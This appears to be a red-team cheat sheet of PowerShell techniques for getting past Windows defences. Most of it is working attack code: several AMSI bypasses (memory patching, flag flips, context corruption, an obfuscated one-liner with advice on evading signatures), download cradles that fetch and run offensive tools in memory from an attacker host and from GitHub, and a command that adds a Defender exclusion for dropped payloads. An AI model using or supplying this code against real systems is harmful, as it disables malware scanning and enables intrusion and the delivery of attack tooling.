AMSI bypass
Memory-patching approach (reported working at the time this page was last updated; AMSI and Defender signatures change often, so re-test on the target build before relying on it):
# Memory-patching AMSI bypass for the CURRENT PowerShell process.
# Strategy: resolve the export address of amsi!AmsiScanBuffer, find the native entry
# point of System.Management.Automation.AmsiUtils.ScanContent, then scan backwards from
# that entry point for an 8-byte slot holding the AmsiScanBuffer address and overwrite
# that slot with the address of the managed stub APIs.Dummy (which just returns 1).
# Presumably that slot is the cached/imported pointer ScanContent calls through — the
# script itself only knows it is an 8-byte value equal to the export address.
#   $InitialStart   first backward offset (bytes) below ScanContent to read from
#   $NegativeOffset how far further down to step after each unsuccessful chunk
#   $MaxOffset      give up once the offset reaches this distance below ScanContent
#   $ReadBytes      size of each ReadProcessMemory chunk
# Pointers are compared as 8-byte values ([bitconverter]::ToInt64), so this is only
# meaningful in a 64-bit PowerShell host. Nothing persists beyond this process.
param($InitialStart=0x50000,$NegativeOffset=0x50000,$MaxOffset=0x1000000,$ReadBytes=0x50000);
# kernel32 P/Invoke shims plus the replacement function. Dummy carries
# NoOptimization|NoInlining so the JIT keeps a real, addressable function body to point at.
$APIs='using System;using System.ComponentModel;using System.Management.Automation;using System.Reflection;using System.Runtime.CompilerServices;using System.Runtime.InteropServices;using System.Text;public class APIs {[DllImport("kernel32.dll")]public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UInt32 nSize, ref UInt32 lpNumberOfBytesRead);[DllImport("kernel32.dll")]public static extern IntPtr GetCurrentProcess();[DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true, SetLastError=true)]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);[DllImport("kernel32.dll", CharSet=CharSet.Auto)]public static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.LPWStr)] string lpModuleName);[MethodImpl(MethodImplOptions.NoOptimization | MethodImplOptions.NoInlining)]public static int Dummy() {return 1;}}';
Add-Type $APIs;
$InitialDate=Get-Date;
# The strings 'amsi.dll' and 'AmsiScanBuffer' are assembled by successive replacements on
# 'hello, world' so neither literal appears in the script text (static-signature evasion).
# $string  -> 'amsi.dll'
$string='hello, world';$string=$string.replace('he','a');$string=$string.replace('ll','m');$string=$string.replace('o,','s');$string=$string.replace(' ','i');$string=$string.replace('wo','.d');$string=$string.replace('rld','ll');
# $string2 -> 'AmsiScan'
$string2='hello, world';$string2=$string2.replace('he','A');$string2=$string2.replace('ll','m');$string2=$string2.replace('o,','s');$string2=$string2.replace(' ','i');$string2=$string2.replace('wo','Sc');$string2=$string2.replace('rld','an');
# $string3 -> 'Buffer'
$string3='hello, world';$string3=$string3.replace('hello','Bu');$string3=$string3.replace(', ','ff');$string3=$string3.replace('world','er');
# Export address of AmsiScanBuffer in the already-loaded amsi.dll.
# NOTE(review): neither handle is checked; if amsi.dll is not loaded yet, $Address and
# $funcAddr are zero and the scan below can never match.
$Address=[APIS]::GetModuleHandle($string);
[IntPtr]$funcAddr=[APIS]::GetProcAddress($Address,$string2+$string3);
# Locate the type/method by shape rather than by name, again to avoid literal strings:
#   assembly simple name: starts 'S', ends 'n', 28 chars  -> System.Management.Automation
#   type name:            starts 'A', ends 's', 9 chars   -> AmsiUtils
#   static non-public method: starts 'S', ends 't', 11 chars -> ScanContent
# Each loop keeps the LAST match, so an unexpected extra match would silently win.
$Assemblies=[appdomain]::currentdomain.getassemblies();
$Assemblies|ForEach-Object{if($_.Location-ne $null){$split1=$_.FullName.Split(",")[0];If($split1.StartsWith('S')-And $split1.EndsWith('n')-And $split1.Length-eq 28){$Types=$_.GetTypes()}}};
$Types|ForEach-Object{if($_.Name-ne $null){If($_.Name.StartsWith('A')-And $_.Name.EndsWith('s')-And $_.Name.Length-eq 9){$Methods=$_.GetMethods([System.Reflection.BindingFlags]'Static,NonPublic')}}};
$Methods|ForEach-Object{if($_.Name-ne $null){If($_.Name.StartsWith('S')-And $_.Name.EndsWith('t')-And $_.Name.Length-eq 11){$MethodFound=$_}}};
# Native entry point of ScanContent (forces a JIT of the method if not already compiled).
[IntPtr]$MethodPointer=$MethodFound.MethodHandle.GetFunctionPointer();
[IntPtr]$Handle=[APIs]::GetCurrentProcess();
$dummy=0;
$ApiReturn=$false;
# Walk DOWNWARD from ScanContent in $NegativeOffset steps; each step reads a $ReadBytes
# window starting at (ScanContent - $j) and searches it for the 8-byte AmsiScanBuffer address.
# NOTE(review): $ApiReturn (ReadProcessMemory's success flag) is never checked — a failed read
# leaves the buffer zero-filled and the search simply continues with it.
# NOTE(review): the inner loop indexes up to $i+7, i.e. past the end of the array for the last
# seven positions; PowerShell yields $null there (cast to 0), so no exception, just padding.
:initialloop for($j=$InitialStart;$j-lt $MaxOffset;$j+=$NegativeOffset){
[IntPtr]$MethodPointerToSearch=[Int64]$MethodPointer-$j;
$ReadedMemoryArray=[byte[]]::new($ReadBytes);
$ApiReturn=[APIs]::ReadProcessMemory($Handle,$MethodPointerToSearch,$ReadedMemoryArray,$ReadBytes,[ref]$dummy);
for($i=0;$i-lt $ReadedMemoryArray.Length;$i+=1){
$bytes=[byte[]]($ReadedMemoryArray[$i],$ReadedMemoryArray[$i+1],$ReadedMemoryArray[$i+2],$ReadedMemoryArray[$i+3],$ReadedMemoryArray[$i+4],$ReadedMemoryArray[$i+5],$ReadedMemoryArray[$i+6],$ReadedMemoryArray[$i+7]);
[IntPtr]$PointerToCompare=[bitconverter]::ToInt64($bytes,0);
if($PointerToCompare-eq $funcAddr){Write-Host "Found @ $($j) : $($i)!";[IntPtr]$MemoryToPatch=[Int64]$MethodPointerToSearch+$i;break initialloop}
}
};
# Overwrite the located slot with the address of Dummy. Dummy returns 1 (not S_OK) where
# AmsiScanBuffer would return an HRESULT; callers presumably treat that as a failed scan
# rather than a detection — TODO confirm against AmsiUtils.ScanContent on the target build.
# NOTE(review): if the scan above never matched, $MemoryToPatch is unset, Marshal.Copy is
# handed a zero destination pointer and the host will most likely crash with an access
# violation. A practitioner should guard: if(-not $MemoryToPatch){throw 'pointer slot not found'}.
[IntPtr]$DummyPointer=[APIs].GetMethod('Dummy').MethodHandle.GetFunctionPointer();
$buf=[IntPtr[]]($DummyPointer);
[System.Runtime.InteropServices.Marshal]::Copy($buf,0,$MemoryToPatch,1);
$FinishDate=Get-Date;
$TimeElapsed=($FinishDate-$InitialDate).TotalSeconds;
Write-Host "$TimeElapsed seconds"
# Flip System.Management.Automation.AmsiUtils.amsiInitFailed to $true via reflection so the
# engine behaves as if AMSI initialisation failed and skips scanning for the rest of this
# process. Type and field are matched on name suffixes ("*iUtils", "*nitFailed") only, so the
# full identifiers never appear in the script text. Like the original, the LAST match wins.
# Process-local: nothing is written to disk or the registry.
$utilsType = [Ref].Assembly.GetTypes() | Where-Object { $_.Name -like "*iUtils" } | Select-Object -Last 1
$flagField = $utilsType.GetFields("NonPublic,Static") | Where-Object { $_.Name -like "*nitFailed" } | Select-Object -Last 1
$flagField.SetValue($null, $true)
Corrupt the AMSI context (zero the first bytes of the native context that AmsiUtils.amsiContext points to, so subsequent scans error out instead of returning a verdict):
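# Corrupt the AMSI context: read AmsiUtils.amsiContext (an IntPtr to the native context
# handle) and overwrite its first 4 bytes with 0. Later AmsiScanBuffer calls presumably fail
# their context validation and return an error rather than a detection — TODO confirm
# against the amsi.dll build in use. Process-local; nothing persists.
# Fixes vs. the original one-liner: the leading "1" was a copied gutter number (the line did
# not parse), and the pointer is now checked before the write — if AmsiUtils has not
# initialised AMSI yet the field is still zero and the Copy would target address 0.
$utilsType = $null
Foreach ($t in [Ref].Assembly.GetTypes()) { if ($t.Name -like "*iUtils") { $utilsType = $t } }
$ctxField = $null
Foreach ($f in $utilsType.GetFields('NonPublic,Static')) { if ($f.Name -like "*Context") { $ctxField = $f } }
[IntPtr]$ptr = $ctxField.GetValue($null)
if ($ptr -eq [IntPtr]::Zero) { throw "amsiContext is still zero (AMSI not initialised in this process yet); nothing to corrupt." }
[Int32[]]$buf = @(0)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)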
Corrupt initialization state (set AmsiUtils.amsiInitFailed = $true; same technique as the one-liner above):
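# Same technique as the earlier amsiInitFailed one-liner: set
# System.Management.Automation.AmsiUtils.amsiInitFailed to $true so the engine skips AMSI
# scanning for the rest of this process. Suffix matches keep the identifiers out of the
# script text; the LAST matching type/field wins. Process-local only.
# Fix: removed the leading "1" (a copied line number) that made the line unparsable.
$utilsType = $null
Foreach ($t in [Ref].Assembly.GetTypes()) { if ($t.Name -like "*iUtils") { $utilsType = $t } }
$flagField = $null
Foreach ($f in $utilsType.GetFields("NonPublic,Static")) { if ($f.Name -like "*nitFailed") { $flagField = $f } }
$flagField.SetValue($null, $true)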
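# Obfuscated form of the amsiInitFailed flip. Resolving the format strings and backtick
# escapes, it executes:
#   [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# The [Ref] accelerator is stashed in a variable named 1q2uZx and read back with Get-Variable
# so the token 'Ref' never appears literally. Process-local; nothing persists.
# NOTE(review): this exact string has circulated publicly for a long time — assume it is
# signatured and re-obfuscate before use.
# Fix: removed the leading "1" (a copied line number) that made the line unparsable.
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )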
PowerShell download cradles (fetch a script over HTTP(S) and execute it in memory with IEX; the script text is still presented to AMSI, so apply one of the bypasses above first if the tool is signatured):
# Download cradle: fetch PowerView from the attacker-controlled host over plain HTTP and
# run it in memory with Invoke-Expression. Nothing is written to disk, but the downloaded
# text still goes through AMSI script-block scanning unless a bypass was applied first.
# NOTE(review): 10.10.15.194 is a lab listener address — replace with your own.
# Pipeline form (DownloadString output piped into Invoke-Expression):
(New-Object -TypeName System.Net.WebClient).DownloadString('http://10.10.15.194/PowerView.ps1') | Invoke-Expression
# Argument form (same effect, result passed as the -Command argument):
Invoke-Expression (New-Object -TypeName System.Net.WebClient).DownloadString('http://10.10.15.194/PowerView.ps1')
# Download cradles that pull well-known tooling straight from GitHub and execute it in
# memory: WinPwn (recon/privesc wrapper), PowerView (AD enumeration), PowerUp (local privesc
# checks) and Inveigh (LLMNR/NBNS/mDNS spoofing). Each needs outbound HTTPS from the target to
# raw.githubusercontent.com; these repositories are widely signatured, so an AMSI bypass is
# usually required first.
Invoke-Expression (New-Object -TypeName Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
Invoke-Expression (New-Object -TypeName Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')
Invoke-Expression (New-Object -TypeName Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
Invoke-Expression (New-Object -TypeName Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1')
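# Download cradle for Invoke-Rubeus (PowerSharpPack wrapper around Rubeus) executed in memory.
# Fix: the original pointed at the github.com/.../blob/... page, which returns the HTML viewer
# rather than the script, so Invoke-Expression fails on the markup. Use the raw file URL like
# the other cradles on this page.
Invoke-Expression (New-Object -TypeName Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')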
# Download cradle for the SharpHound collector (BloodHound ingestor) executed in memory.
# Requires outbound HTTPS to raw.githubusercontent.com from the target.
Invoke-Expression (New-Object -TypeName Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1')
Defender exclusion (needs an elevated shell; the exclusion is persistent and preference changes are a common detection, so remove it when done):
# Add a Microsoft Defender path exclusion for C:\windows\tasks so payloads dropped there are
# not scanned. Add-MpPreference requires local administrator rights and the exclusion
# persists until removed (Remove-MpPreference -ExclusionPath ...).
$mpArgs = @{ ExclusionPath = 'C:\windows\tasks' }
Add-MpPreference @mpArgs